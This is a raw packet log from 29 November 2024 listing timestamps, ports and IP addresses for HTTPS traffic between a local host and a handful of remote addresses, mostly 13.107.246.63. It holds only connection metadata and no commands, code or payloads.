Nov 29, 2024 12:27:11.782248020 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:11.784504890 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:11.784938097 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:11.888520956 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:11.891475916 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:11.899705887 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:11.904377937 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:11.904808044 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:11.973903894 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:11.974024057 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:11.976550102 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:12.011521101 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:12.096338987 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:12.097284079 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:12.099432945 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:12.104394913 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:12.104449987 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:12.104476929 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:12.104496002 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:12.107449055 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:12.108370066 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:12.228188038 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:12.269257069 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:12.288750887 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:12.291333914 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:12.296400070 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:12.296469927 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:12.298429966 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:12.411350012 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:12.419416904 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:12.423942089 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:12.424011946 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:12.424081087 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:12.488380909 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:12.542363882 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:12.611562014 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:12.615722895 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:12.615859985 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:13.005109072 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:13.025557995 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:13.032242060 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:13.055783033 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:13.083241940 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:13.145575047 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:13.175925970 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:13.253281116 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:13.320368052 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:13.344295979 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:13.344538927 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:13.346982956 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:13.349385023 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:13.368159056 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:13.395294905 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:13.395672083 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:13.412153006 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:13.466919899 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:13.469685078 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:13.511506081 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:13.515714884 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:13.532406092 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:13.558074951 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:13.559425116 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:13.664747953 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:13.664803028 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:13.664942026 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:13.667812109 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:13.679546118 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:13.690352917 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:13.690651894 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:13.724759102 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:13.759082079 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:13.810399055 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:13.810578108 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:13.856158972 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:13.856365919 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:13.859065056 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:13.879060030 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:13.965269089 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:13.968116999 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:13.980019093 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:14.007174969 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:14.007219076 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:14.007261038 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:14.007286072 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:14.009948969 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:14.010647058 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:14.127233028 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:14.130759001 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:14.171375990 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:14.173440933 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:14.199281931 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:14.199368000 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:14.201324940 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:14.214238882 CET	49676	443	192.168.2.8	52.182.143.211
Nov 29, 2024 12:27:14.321284056 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:14.321765900 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:14.325429916 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:14.390796900 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:14.390863895 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:14.390899897 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:14.390949965 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:14.393141031 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:14.393239975 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:14.497585058 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:14.513115883 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:14.513273001 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:14.513436079 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:14.513500929 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:14.513590097 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:14.515680075 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:14.557590961 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:14.560029984 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:14.680141926 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:14.705040932 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:14.707266092 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:14.710928917 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:14.711000919 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:14.711013079 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:14.711067915 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:14.712889910 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:14.713841915 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:14.715740919 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:14.832864046 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:14.872209072 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:14.876075029 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:14.899635077 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:14.899755955 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:14.901865959 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:15.021832943 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:15.024848938 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:15.027170897 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:15.027602911 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:15.027658939 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:15.029787064 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:15.063947916 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:15.065907001 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:15.149770975 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:15.213953018 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:15.216242075 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:15.216857910 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:15.218705893 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:15.261076927 CET	49673	443	192.168.2.8	23.206.229.226
Nov 29, 2024 12:27:15.338648081 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:15.352543116 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:15.352690935 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:15.352758884 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:15.355073929 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:15.355128050 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:15.405713081 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:15.407846928 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:15.475828886 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:15.534096956 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:15.534147024 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:15.534205914 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:15.536355972 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:15.536452055 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:15.651717901 CET	49672	443	192.168.2.8	23.206.229.226
Nov 29, 2024 12:27:15.656333923 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:15.670468092 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:15.670561075 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:15.670627117 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:15.673285007 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:15.673403978 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:15.725867033 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:15.728241920 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:15.793379068 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:15.823599100 CET	49677	80	192.168.2.8	192.229.211.108
Nov 29, 2024 12:27:15.855954885 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:15.856137991 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:15.856220007 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:15.860668898 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:15.861696959 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:15.981652975 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:15.995218992 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:15.995368958 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:15.995459080 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:15.998732090 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:15.998814106 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:16.047785997 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:16.050843954 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:16.119138002 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:16.186634064 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:16.186696053 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:16.186801910 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:16.189747095 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:16.189929008 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:16.309940100 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:16.316766977 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:16.316863060 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:16.316931963 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:16.322487116 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:16.323394060 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:16.378345966 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:16.384692907 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:16.443341970 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:16.508523941 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:16.511079073 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:16.570276976 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:16.574691057 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:16.641421080 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:16.641519070 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:16.641594887 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:16.645880938 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:16.646110058 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:16.700489998 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:16.714709044 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:16.767106056 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:16.833741903 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:16.833801985 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:16.836952925 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:16.881504059 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:16.956878901 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:16.958910942 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:16.961555958 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:16.962402105 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:16.962519884 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:16.962558031 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:16.962574005 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:16.964956045 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:16.965060949 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:17.084923983 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:17.125447035 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:17.149086952 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:17.152087927 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:17.154234886 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:17.198585033 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:17.272104979 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:17.277144909 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:17.281667948 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:17.281733990 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:17.281845093 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:17.323601961 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:17.396184921 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:17.396723986 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:17.396874905 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:17.397526979 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:17.473558903 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:17.473619938 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:17.477025032 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:17.519428968 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:17.519587040 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:17.642244101 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:17.711756945 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:17.714670897 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:17.714729071 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:17.714855909 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:17.743992090 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:17.745058060 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:17.745441914 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:17.788981915 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:17.789041042 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:17.792260885 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:17.864182949 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:17.865350008 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:17.865603924 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:17.905740023 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:17.909002066 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:17.912307978 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:18.029021978 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:18.062155008 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:18.062212944 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:18.062277079 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:18.088181973 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:18.088843107 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:18.098140955 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:18.100090981 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:18.208862066 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:18.226236105 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:18.232441902 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:18.234508991 CET	49706	443	192.168.2.8	149.154.167.99
Nov 29, 2024 12:27:18.234539986 CET	443	49706	149.154.167.99	192.168.2.8
Nov 29, 2024 12:27:18.234652996 CET	49706	443	192.168.2.8	149.154.167.99
Nov 29, 2024 12:27:18.247847080 CET	49706	443	192.168.2.8	149.154.167.99
Nov 29, 2024 12:27:18.247862101 CET	443	49706	149.154.167.99	192.168.2.8
Nov 29, 2024 12:27:18.253887892 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:18.259887934 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:18.379960060 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:18.409991980 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:18.410101891 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:18.410228014 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:18.427495003 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:18.427525997 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:18.505274057 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:18.507553101 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:18.547432899 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:18.572156906 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:18.572238922 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:18.574956894 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:18.601623058 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:18.613162994 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:18.673584938 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:18.694871902 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:18.733184099 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:18.743041039 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:18.743273020 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:18.745481968 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:18.766757965 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:18.768029928 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:18.886877060 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:18.890727043 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:18.925133944 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:18.925201893 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:18.928716898 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:18.934863091 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:18.937776089 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:19.048718929 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:19.084974051 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:19.085089922 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:19.085205078 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:19.241049051 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:19.252574921 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:19.252643108 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:19.252655983 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:19.292310953 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:19.348701954 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:19.355237007 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:19.357374907 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:19.358645916 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:19.360598087 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:19.475209951 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:19.478612900 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:19.521552086 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:19.661945105 CET	443	49706	149.154.167.99	192.168.2.8
Nov 29, 2024 12:27:19.662035942 CET	49706	443	192.168.2.8	149.154.167.99
Nov 29, 2024 12:27:19.672411919 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:19.674951077 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:19.675015926 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:19.675040960 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:19.675101042 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:19.677093029 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:19.678458929 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:19.678518057 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:19.678589106 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:19.678639889 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:19.681217909 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:19.681884050 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:19.682629108 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:19.712152958 CET	49706	443	192.168.2.8	149.154.167.99
Nov 29, 2024 12:27:19.712174892 CET	443	49706	149.154.167.99	192.168.2.8
Nov 29, 2024 12:27:19.712481976 CET	443	49706	149.154.167.99	192.168.2.8
